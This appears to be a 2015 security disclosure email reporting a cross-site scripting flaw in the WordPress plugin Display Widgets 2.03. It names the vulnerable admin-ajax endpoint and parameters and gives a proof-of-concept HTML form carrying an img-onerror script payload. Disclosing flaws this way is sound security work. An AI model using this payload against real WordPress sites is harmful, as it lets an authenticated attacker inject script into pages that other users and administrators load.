Subject: Cross-Site Scripting (XSS) in Display Widgets 2.03
Date: Tue, 11 Aug 2015 13:29:55 +0200

Hello,

Plugin: Display Widgets 2.03 https://wordpress.org/plugins/display-widgets/

1. Cross-Site Scripting (XSS) 

Authenticated users (like subscribers) can inject html/js code.

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=dw_show_widget
Vulnerable parameters: id_base, widget_number, instance (proper json with payload in 'other_ids' key)

Example PHP callstack:
DWPlugin::show_widget_options   [/display-widgets/display-widgets.php:283]
DWPlugin::show_hide_widget_options   [/display-widgets/display-widgets.php:297]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=dw_show_widget">
<input type="text" name="id_base" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--


--
Regards,
Marcin Probola,